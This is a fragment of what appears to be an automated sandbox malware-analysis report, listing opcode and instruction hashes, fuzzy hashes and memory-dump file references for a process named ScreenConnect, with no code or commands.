                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 240fa198b65af20e46fe56046cf7ec196bdfd4e9195621e910c271c6fe0888f0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3F0303140D69C9FCB42EB64E450DD67FB0EF17315B0541C7E049CB063D6219A59CBC2
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: f5cf78a6073721c3883dbcd5f578df2f5d5ea0bd159f1562be8065a1e076f03b
                                                                                                                                                                                                                                                        • Instruction ID: edb75dc7a830fcc1bd8eab434c835c62a83ab1a53ef91af1c4990d30315c3b67
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f5cf78a6073721c3883dbcd5f578df2f5d5ea0bd159f1562be8065a1e076f03b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 71F0393540C6989FCB46EB78D4509D6BFB0FE56325B0502CBE049CB062E7219A59CB82
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd